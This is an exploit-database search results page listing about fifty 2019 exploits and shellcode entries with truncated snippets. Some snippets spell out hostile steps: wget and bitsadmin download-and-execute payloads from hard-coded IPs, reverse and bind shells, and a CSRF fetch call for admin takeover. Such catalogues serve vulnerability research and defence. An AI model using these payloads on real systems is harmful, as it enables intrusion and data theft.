39001 matches found
WordPress Like Button 1.6.0 Plugin - Authentication Bypass Vulnerability
Exploit for php platform in category web applications Exploit Title: WP Like Button 1.6.0 - Auth Bypass Exploit Author: Benjamin Lim Vendor Homepage: http://www.crudlab.com Software Link: https://wordpress.org/plugins/wp-like-button/ Version: 1.6.0 CVE : CVE-2019-13344 1. Product & Service...
Cisco Data Center Network Manager 11.1(1) Remote Code Execution Exploit
Cisco Data Center Network Manager DCNM versions 11.11 and below suffer from authentication bypass, arbitrary file upload, arbitrary file download, and information disclosure vulnerabilities. Authentication Bypass and Arbitrary File Upload leading to remote code execution on Cisco Data Center...
Sony BRAVIA Smart TV Denial Of Service Vulnerability
Sony BRAVIA Smart TV Denial Of Service ADVISORY INFORMATION TITLE: Two vulnerabilities found in Sony BRAVIA Smart TVs ADVISORY URL: CVE-2019-11889 https://www.darkmatter.ae/xen1thlabs/sony-remote-denial-of-service-triggered-over-vulnerability-hbbtv-xl-19-014/ CVE-2019-11890...
Karenderia CMS 5.3 SQL Injection Vulnerability
Exploit for php platform in category web applications =========================================================================================== Exploit Title: Karenderia CMS 5.3 - Multiple SQL Vuln. Exploit Author: Mehmet EMIROGLU Vendor Homepage: email protected Software Link:...
Huawei HG530 Cross Site Request Forgery Vulnerability
Exploit for hardware platform in category web applications Multiple CSRF reboot and restore Vulnerability =========================== The Huawei HG530 suffers from multiple CSRF vulnerability allows local attackers to reboot the device or to restore to factory Configuration. ================== Th...
Karenderia Multiple Restaurant System 5.3 - Local File Inclusion Vulnerability
Exploit for php platform in category web applications =========================================================================================== Exploit Title: Karenderia CMS 5.1 - LFI Vuln. Dork: N/A Date: 04-07-2019 Exploit Author: Mehmet EMIROGLU Software Link:...
Microsoft Exchange 2003 - base64-MIME Remote Code Execution Exploit
Python 2.7 included with ImmunityDBG Exchange 2003 SP0 base64-MIME memory corruption NSA's ENGLISHMANSDENTIST Platform: Windows Server 2003 R2 Shout out to the Equation Group, NSA Tailored Access Operations Author: Charles Truscott @r0ss1n1 Shout out to Offensive Security, from Australia with Lov...
BKS EBK Ethernet-Buskoppler Pro Shell Upload Vulnerability
BKS EBK Ethernet-Buskoppler Pro versions prior to 3.01 suffer from a remote shell upload vulnerability. Product: BKS EBK Ethernet-Buskoppler Pro Manufacturer: BKS GmbH Affected Versions: 3.01 Vulnerability Type: Unrestricted Upload of File with Dangerous Type CWE-434 Risk Level: High Solution...
Google ChromeOS SafeSetID LSM Transitive Trust Exploit
ChromeOS: multiple issues in SafeSetID LSM I decided to take a look at the new SafeSetID LSM that ChromeOS upstreamed and found several issues. Since this LSM is already running on Pixelbook on the stable channel, I'm filing this as a security bug. This LSM restricts the use of CAPSETUID by...
Hawtio 2.5.0 Server Side Request Forgery Vulnerability
Exploit for java platform in category web applications Hawtio Server-Side Request Forgery Introduction ============ Hawtio https://hawt.io/ is a modular web console for managing Java. CipherTechs discovered that Hawtio up to and including version 2.5.0 is vulnerable to unauthenticated Server-Side...
Symantec DLP 15.5 MP1 - Cross-Site Scripting Vulnerability
Exploit for multiple platform in category web applications Exploit Title: Persistent XSS on Symantec DLP = 15.5 MP1 Exploit Author: Chapman Schleiss Vendor Homepage: https://www.symantec.com/ Software Link: https://support.symantec.com/us/en/mysymantec.html Version: = 15.5 MP1 CVE : 2019-9701...
PowerPanel Business Edition - Cross-Site Scripting Vulnerability
Exploit for linux platform in category web applications Exploit Title: PowerPanel Business Edition - Stored Cross Site Scripting SNMP trap receivers Google Dork: None Exploit Author: Joey Lane Vendor Homepage: https://www.cyberpowersystems.com Software Link:...
ZoneMinder 1.32.3 - Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: ZoneMinder 1.32.3 - Stored Cross Site Scripting filters Google Dork: None Exploit Author: Joey Lane Vendor Homepage: https://zoneminder.com Software Link: https://github.com/ZoneMinder/zoneminder/releases Version: 1.32.3 Tested...
CiuisCRM 1.6 - eventType SQL Injection Vulnerability
Exploit for php platform in category web applications =========================================================================================== Exploit Title: CiuisCRM 1.6 - 'eventType' SQL Inj. Exploit Author: Mehmet EMİROĞLU Vendor Homepage: https://codecanyon.net/item/ciuis-crm/20473489...
FaceSentry Access Control System 6.4.8 - Remote Root Exploit
Exploit for hardware platform in category web applications !/usr/bin/env python -- coding: utf-8 -- FaceSentry Access Control System 6.4.8 Remote Root Exploit Vendor: iWT Ltd. Product web page: http://www.iwt.com.hk Affected version: Firmware 6.4.8 build 264 Algorithm A16 Firmware 5.7.2 build 568...
FaceSentry Access Control System 6.4.8 - Remote SSH Root Exploit
Exploit for hardware platform in category web applications !/usr/bin/env python -- coding: utf-8 -- FaceSentry Access Control System 6.4.8 Remote SSH Root Access Exploit Vendor: iWT Ltd. Product web page: http://www.iwt.com.hk Affected version: Firmware 6.4.8 build 264 Algorithm A16 Firmware 5.7....
MacOS X #TimeMachine - (tmdiagnose) Command Injection Privilege Escalation Exploit #RCE
Exploit for macOS platform in category local exploits This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Mac OS X TimeMachine tmdiagnose Command Injection Privilege Escalation', 'Description' = %q...
Varient 1.6.1 - SQL Injection Vulnerability
Exploit for multiple platform in category web applications =========================================================================================== Exploit Title: Varient 1.6.1 SQL Inj. Exploit Author: Mehmet EMIROGLU Vendor Homepage: https://varient.codingest.com/ Software Link:...
FaceSentry Access Control System 6.4.8 - Remote Command Injection Vulnerability
Exploit for hardware platform in category web applications FaceSentry Access Control System 6.4.8 Remote Command Injection Vendor: iWT Ltd. Product web page: http://www.iwt.com.hk Affected version: Firmware 6.4.8 build 264 Algorithm A16 Firmware 5.7.2 build 568 Algorithm A14 Firmware 5.7.0 build...
CyberPanel 1.8.4 - Cross-Site Request Forgery Vulnerability
Exploit for multiple platform in category web applications Title: CyberPanel Administrator Account Takeover fetch'https://SERVERIP:8090/users/saveModifications', method: 'POST', credentials: 'include', headers: 'Content-Type': 'text/plain', body:...
SAP Crystal Reports - Information Disclosure Vulnerability
Exploit for multiple platform in category web applications Exploit Title: Sensitive Information Disclosure in SAP Crystal Reports Exploit Author: Mohamed M.Fouad - From SecureMisr Company Vendor Homepage: https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=517899114 Version: SAP Crystal...
Linux/ARM64 - mmap() + read() stager + execve("/bin/sh", NULL, NULL) Shellcode (60 Bytes
/ Title: Linux/ARM64 - mmap + read stager + execve"/bin/sh", NULL, NULL Shellcode 60 Bytes Date: 2019-06-30 Tested: Ubuntu 16.04 aarch64 Author: Ken Kitahara Compilation: gcc -o loader loader.c ubuntu@ubuntu:/works$ lsbrelease -a No LSB modules are available. Distributor ID: Ubuntu Description:...
FaceSentry Access Control System 6.4.8 - Cross-Site Request Forgery Vulnerability
Exploit for hardware platform in category web applications FaceSentry Access Control System 6.4.8 Cross-Site Request Forgery Vendor: iWT Ltd. Product web page: http://www.iwt.com.hk Affected version: Firmware 6.4.8 build 264 Algorithm A16 Firmware 5.7.2 build 568 Algorithm A14 Firmware 5.7.0 buil...
Linux/ARM64 - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (140 bytes)
/ Title: Linux/ARM64 - Reverse ::1:4444/TCP Shell /bin/sh +IPv6 Shellcode 140 bytes Date: 2019-06-30 Tested: Ubuntu 16.04 aarch64 Author: Ken Kitahara Compilation: gcc -o loader loader.c ubuntu@ubuntu:/works$ lsbrelease -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu...
Linux/ARM64 - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (164 bytes)
/ Title: Linux/ARM64 - Bind 4444/TCP Shell /bin/sh + Null-Free Shellcode 164 bytes Date: 2019-06-30 Tested: Ubuntu 16.04 aarch64 Author: Ken Kitahara Compilation: gcc -o loader loader.c ubuntu@ubuntu:/works$ lsbrelease -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu...
Linux/ARM64 - Read /etc/passwd Shellcode (120 Bytes)
/ Title: Linux/ARM64 - Read /etc/passwd Shellcode 120 Bytes Date: 2019-06-30 Tested: Ubuntu 16.04 aarch64 Author: Ken Kitahara Compilation: gcc -o loader loader.c ubuntu@ubuntu:/works$ lsbrelease -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu Xenial Xerus development...
Linux/ARM64 - execve("/bin/sh", NULL, NULL) Shellcode (40 Bytes)
/ Title: Linux/ARM64 - execve"/bin/sh", NULL, NULL Shellcode 40 Bytes Date: 2019-06-30 Tested: Ubuntu 16.04 aarch64 Author: Ken Kitahara Compilation: gcc -o loader loader.c ubuntu@ubuntu:/works$ lsbrelease -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu Xenial Xerus...
Linux/ARM64 - Egghunter (PWN!PWN!) + execve("/bin/sh", NULL, NULL) + mprotect() Shellcod
/ Title: Linux/ARM64 - Egghunter PWN!PWN! + execve"/bin/sh", NULL, NULL + mprotect Shellcode 88 Bytes Date: 2019-06-30 Tested: Ubuntu 16.04 aarch64 Author: Ken Kitahara Compilation: gcc -o loader loader.c ubuntu@ubuntu:/works$ lsbrelease -a No LSB modules are available. Distributor ID: Ubuntu...
Linux Mint 18.3-19.1 - yelp Command Injection Exploit
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework Exploit from github repro: https://github.com/b1ack0wl/linuxmintpoc class MetasploitModule "Linux Mint 'yelp' URI handler command injection vulnerability", 'Description'...
Apache Tomcat CGIServlet enableCmdLineArguments Remote Code Execution Exploit
This Metasploit module exploits a vulnerability in Apache Tomcat's CGIServlet component. When the enableCmdLineArguments setting is set to true, a remote user can abuse this to execute system commands, and gain remote code execution. This module requires Metasploit: https://metasploit.com/downloa...
Serv-U FTP Server 15.1.7 prepareinstallation Privilege Escalation Exploit
This Metasploit module attempts to gain root privileges on systems running Serv-U FTP Server versions prior to 15.1.7. The Serv-U executable is setuid root, and uses ARGV0 in a call to system, without validation, when invoked with the -prepareinstallation flag, resulting in command execution with...
Sahi pro 8.x - Directory Traversal Exploit
Exploit for multiple platform in category web applications Exploit Title: Sahi pro 8.x Directory traversal Exploit Author: Alexander Bluestein Vendor Homepage: https://sahipro.com/ Software Link: https://sahipro.com/downloads-archive/ Version: 8.0 Tested on: Linux Ubuntu / Windows 7 CVE:...
Linux/ARM64 - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (176 bytes)
/ Title: Linux/ARM64 - Bind 4444/TCP Shell /bin/sh + IPv6 Shellcode 176 bytes Date: 2019-06-30 Tested: Ubuntu 16.04 aarch64 Author: Ken Kitahara Compilation: gcc -o loader loader.c ubuntu@ubuntu:/works$ lsbrelease -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu Xenial...
Linux/ARM64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (128 bytes)
/ Title: Linux/ARM64 - Reverse 127.0.0.1:4444/TCP Shell /bin/sh + Null-Free Shellcode 128 bytes Date: 2019-06-30 Tested: Ubuntu 16.04 aarch64 Author: Ken Kitahara Compilation: gcc -o loader loader.c ubuntu@ubuntu:/works$ lsbrelease -a No LSB modules are available. Distributor ID: Ubuntu...
Centreon 19.04 - Remote Code Execution Exploit #RCE
Exploit for php platform in category web applications !/usr/bin/python ''' Exploit Title: Centreon v19.04 authenticated Remote Code Execution Date: 28/06/2019 Exploit Author: Askar @mohammadaskar2 CVE : CVE-2019-13024 Vendor Homepage: https://www.centreon.com/ Software link:...
Linux/x86 - execve(/bin/sh) using JMP-CALL-POP Shellcode (21 bytes)
/ ;Category: Shellcode ;Title: GNU/Linux x86 - execve /bin/sh using JMP-CALL-POP technique 21 bytes ;Author: kiriknik ;Date: 01/07/2019 ;Architecture: Linux x86 =========== Asm Source =========== global start section .text start: jmp short callshellcode shellcode: pop ebx xor eax,eax mov al, 11 i...
Linux/ARM64 - execve(/bin/sh, [/bin/sh], NULL) Shellcode (48 Bytes)
/ Title: Linux/ARM64 - execve"/bin/sh", "/bin/sh", NULL Shellcode 48 Bytes Date: 2019-06-30 Tested: Ubuntu 16.04 aarch64 Author: Ken Kitahara Compilation: gcc -o loader loader.c ubuntu@ubuntu:/works$ lsbrelease -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu Xenial Xer...
WorkSuite PRM 2.4 - password SQL Injection Vulnerability
Exploit for php platform in category web applications =========================================================================================== Exploit Title: WorkSuite PRM 2.4 - 'password' SQL Inj. Exploit Author: Mehmet EMİROĞLU Vendor Homepage:...
Linux/ARM64 - Jump Back Shellcode + execve(/bin/sh, NULL, NULL) Shellcode (8 Bytes)
/ Title: Linux/ARM64 - Jump Back Shellcode + execve"/bin/sh", NULL, NULL Shellcode 8 Bytes Date: 2019-06-30 Tested: Ubuntu 16.04 aarch64 Author: Ken Kitahara Compilation: gcc -o loader loader.c ubuntu@ubuntu:/works$ lsbrelease -a No LSB modules are available. Distributor ID: Ubuntu Description:...
LibreNMS 1.46 - addhost Remote Code Execution Exploit
Exploit for php platform in category web applications !/usr/bin/python ''' Exploit Title: LibreNMS v1.46 authenticated Remote Code Execution Date: 24/12/2018 Exploit Author: Askar @mohammadaskar2 CVE : CVE-2018-20434 Vendor Homepage: https://www.librenms.org/ Version: v1.46 Tested on: Ubuntu 18.0...
Linux/x86 - Chmod + Execute (/usr/bin/wget 192.168.1.93//x) Hide Output Shellcode (129 bytes)
Linux/x86 - Chmod + Execute /usr/bin/wget http://192.168.1.93//x + Hide Output Shellcode 129 bytes / ; Shellcode 129 Bytes ; download via wget + chmod + execute shellcode + hide output ; Exec: /usr/bin/wget http://192.168.1.93//x /dev/null 2&1 ; global start section .text start: ;fork xor eax,eax...
Windows/x86 - Start iexplore.exe (http://192.168.10.10/) Shellcode (191 Bytes)
191 bytes small Windows/x86 start iexplore.exe shellcode. / Title: start iexplore.exe Author: Joseph McDonagh Shellcode length 191 Could be smaller if the app your are exploiting loads msvcrt. Purpose: Use the start command to open internet explorer and connect to a malicious web server The comma...
Windows Escalate UAC Protection Bypass Via SilentCleanup Exploit
There's a task in Windows Task Scheduler called "SilentCleanup" which, while it's executed as Users, automatically runs with elevated privileges. When it runs, it executes the file %windir%\system32\cleanmgr.exe. Since it runs as Users, and we can control user's environment variables, %windir%...
Linux/x86 - ASCII AND, SUB, PUSH, POPAD Encoder Shellcode
!/usr/bin/env python3 INTRODUCTION Encoder Title: ASCII shellcode encoder via AND, SUB, PUSH, POPAD Date: 26.6.2019 Encoder Author: Petr Javorik, www.mmquant.net Tested on: Linux ubuntu 3.13.0-32-generic, x86 Special thx to: Corelanc0d3r for intro to this technique Description: This encoder is...
AMD Secure Encrypted Virtualization (SEV) Key Recovery Vulnerability
AMD Secure Encrypted Virtualization SEV is a hardware memory encryption feature. SEV protects guest virtual machines from the hypervisor, provides confidentiality guarantees at runtime and remote attestation at launch time. The SEV elliptic-curve ECC implementation was found to be vulnerable to a...
D-Link Administrative Password Disclosure Vulnerability
D-Link models DIR-652, DIR-615, DIR-827, DIR-615, DIR-657, and DIR-825 suffer from an administrative password disclosure vulnerability. DLink Administrative Password Disclosure Vulnerability The problem in the following models : DIR-652 DIR-615 DIR-827 DIR-615 DIR-657 DIR-825 If login to web...
Windows/x86 - bitsadmin Download and Execute Shellcode (210 Bytes)
/ ; Windows/x86 - bitsadmin Download and Execute http://192.168.10.10/evil.exe c:\evil.exe Shellcode 210 Bytes ; Shellcode Title : bitsadmin download and execute ; Shellcode Author : Joseph McDonagh ; Date June 26, 2019 ; Shellcode Length 210 ; However, if the application you are exploiting alrea...
AZADMIN CMS 1.0 - SQL Injection Vulnerability
Exploit for php platform in category web applications + Sql Injection on AZADMIN CMS of HIDEA v1.0 + Date: 24/06/2019 + CWE Number : CWE-89 + Risk: High + Author: Felipe Andrian Peixoto + Vendor Homepage: https://www.hidea.com/ + Contact: email protected + Tested on: Windows 7 and Linux +...
dotProject 2.1.9 - SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: dotProject 2.1.9 - Multiple Sql Injection Poc Exploit Author: Metin Yunus Kandemir kandemir Vendor Homepage: https://dotproject.net Software Link: https://github.com/dotproject/dotProject/archive/v2.1.9.zip Version: 2.1.9...
SeedDMS < 5.1.11 - (out.UsrMgr.php) Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: Persistent Cross-Site Scripting or Stored XSS in out/out.UsrMgr.php in SeedDMS before 5.1.11 Exploit Author: Nimit Jainhttps://secfolks.blogspot.com Vendor Homepage: https://www.seeddms.org Software Link:...